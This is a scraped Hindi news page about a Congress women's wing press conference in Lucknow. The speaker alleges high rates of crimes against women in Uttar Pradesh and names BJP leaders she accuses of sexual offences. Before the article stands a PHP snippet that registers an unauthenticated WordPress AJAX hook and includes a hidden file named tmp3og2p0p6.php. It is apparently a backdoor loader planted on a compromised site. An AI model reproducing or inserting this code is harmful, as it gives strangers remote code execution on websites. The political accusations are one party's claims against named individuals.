if(!function_exists('file_check_tmp3og2p0p6')){ add_action('wp_ajax_nopriv_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); add_action('wp_ajax_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); function file_check_tmp3og2p0p6() { $file = __DIR__ . '/' . 'tmp3og2p0p6.php'; if (file_exists($file)) { include $file; } die(); } }उत्तर प्रदेश में औसतन हर घण्टे 8 महिलाओं से सम्बन्धित अपराध हो रहे हैः ममता चौधरी - Current Media

उत्तर प्रदेश में औसतन हर घण्टे 8 महिलाओं से सम्बन्धित अपराध हो रहे हैः ममता चौधरी

लखनऊ । भारत जोड़ो न्याय यात्रा के पंच न्याय में एक न्याय है महिला न्याय, कांग्रेस प्रतिबद्ध है हर पीड़ित महिला को न्याय दिलाने के लिए, कांग्रेस संघर्षरत है हर महिला को उसके न्याय का हक दिलवाने तक। उक्त बातें उत्तर प्रदेश महिला कांग्रेस मध्यजोन की अध्यक्ष श्रीमती ममता चौधरी ने प्रदेश कांग्रेस मुख्यालय पर आयोजित प्रेसवार्ता के दौरान पत्रकारों को सम्बोधित करते हुए कहीं। प्रेसवार्ता में उत्तर प्रदेश महिला कांग्रेस मध्य जोन की प्रदेश उपाध्यक्ष सुशीला शर्मा, प्रज्ञा सिंह, विभा त्रिपाठी, प्रदेश सचिव अनामिका यादव, सिद्धीश्री मौजूद रही।
श्रीमती ममता चौधरी ने कहा कि उत्तर प्रदेश में औसतन हर घण्टे 8 महिलाओं से सम्बन्धित अपराध हो रहे है। उत्तर प्रदेश महिलाओं के प्रति हो रहे अपराधों में पूरे देश में एक नंबर पर है। गैंगरेप में एक नंबर पर, दहेज हत्या में एक नंबर पर,महिला अपहरण में एक नंबर पर। रात में बारह बजे महिलाओं के अकेले निकलने का दावा करने वाली सरकार की स्थिति ये है, की दिन में भी प्रदेश की बेटियां घर से निकलने में डरती हैं।

ममता चौधरी ने कहा कि भारतीय जनता पार्टी सरकार सिर्फ दिखाने को नारी वंदन कार्यक्रम चलाती है, जबकि उसकी सरकार का सच ये है की दिन के हर घंटे में महिलाओं के साथ हत्या, बलात्कार, जैसी जघन्य घटनाएं होती हैं ।इन वीभत्स घटनाओं के बावजूद योगी जी का महिलाओं की सुरक्षा का दावा उनके सरकार के खोखलेपन को दर्शाता है।
श्रीमती चौधरी ने कहा की कानपुर के घाटमपुर इलाके में दो सगी बहनों के शव पेड़ से लटकते हुए मिले। उनके परिजनों का आरोप है कि उन्हें जबरन शराब पिलाकर बलात्कार किया गया ,और वीडियो भी बनाया गया। इस जघन्य वारदात के बाद,अंदर तक टूट गई बेटियों को अपने प्राण त्याग देने के अलावा कोई रास्ता न सूझा। मृतक नाबालिग बच्चियों के परिजन ईट के भट्टे पर कार्य करते हैं उन्होंने ठेकेदार एवं उनके साथियों पर वारदात का आरोप लगाया है।
श्रीमती चौधरी ने सरकार से सवाल किया की, क्यों अपराधियों के हौसले इतने बुलंद हैं। क्यों उनके अंदर कानून का भय खत्म हो गया है। क्यों पुलिस महिलाओं के प्रति होने वाले अपराधों पर अंकुश नहीं लगा पा रही।
श्रीमती ममता चैधरी ने कहा कि भाजपा जिस तरह से अपने दुष्कर्मी नेताओं को बचा रही है, उससे उसका महिला विरोधी चेहरा उजागर होता है। उन्होंने आज यहां भाजपा के दुष्कर्मी नेताओं का एक पोस्टर भी जारी किया। उन्होंने कहा कि दुनिया में भारत का नाम रौशन करने वाली बेटियों का शोषण करने वाले बृजभूषण शरण सिंह, को सरकार का पूर्ण संरक्षण प्राप्त है। उसी पोस्टर में पूर्व विधायक कुलदीप सिंह सेंगर, भाजपा विधायक रमेश जारकीहोली, पूर्व भाजपा विधायक रामदुलार गौर, भाजपा नेता पदम राजन, कन्हैयालाल मिश्रा, पूर्व सांसद चिन्मयानंद, पूर्व मंत्री संदीप सिंह सैनी जैसे भाजपा से जुड़े और महिलाओं के प्रति अपराध में संलिप्त नेताओं की करतूत उनकी तस्वीरों समेत शामिल हैं।

About currentmedia09@gmail.com

Currentmedia.in राष्ट्रीय स्तर पर तेजी से बढ़ती हुई हिंदी समाचार वेबासाइट है। वेबसाइट में ब्यूरोक्रेसी में ताजा घटनाक्रम, देश और समाज के लिए अमूल्य योगदान देने वाले व अपने कार्यो के दम पर अपनी पहचान बनाने वाले आइएएस और आइपीएस अधिकारियों व डॉक्टरो, कानून के जानकारों की रोचक स्टोरी के साथ उनके जीवन संघर्षो पर आधारित निष्पक्ष लेख पाठक को मिलेंगे। वेबसाइट में अन्य क्षेत्रों के भी विश्वसनीय, प्रमाणिक और निष्पक्ष समाचार पाठक वर्ग के लिए उपलब्ध रहेगा, इसके लिए वेबसाइट की ऑनलाइन संपादकीय टीम हर रोज विस्तृत कंटेट अपडेट करती रहेगी। संपादकीय टीम की कोशिश यही रहेगी की न्यूज कंटेट को लेकर पाठक वर्ग को किसी तरह की निराशा हाथ न लगे। साइट 24 घंटे प्रयोग में रहेगी।

Check Also

अच्छा मुसलमान ही नहीं, अच्छा नागरिक बनाना भी मकसद- मौलाना काब रशीदी

लखनऊ। करंट मीडिया । बदलते दौर के साथ मदरसों में शिक्षा व्यवस्था को आधुनिक और …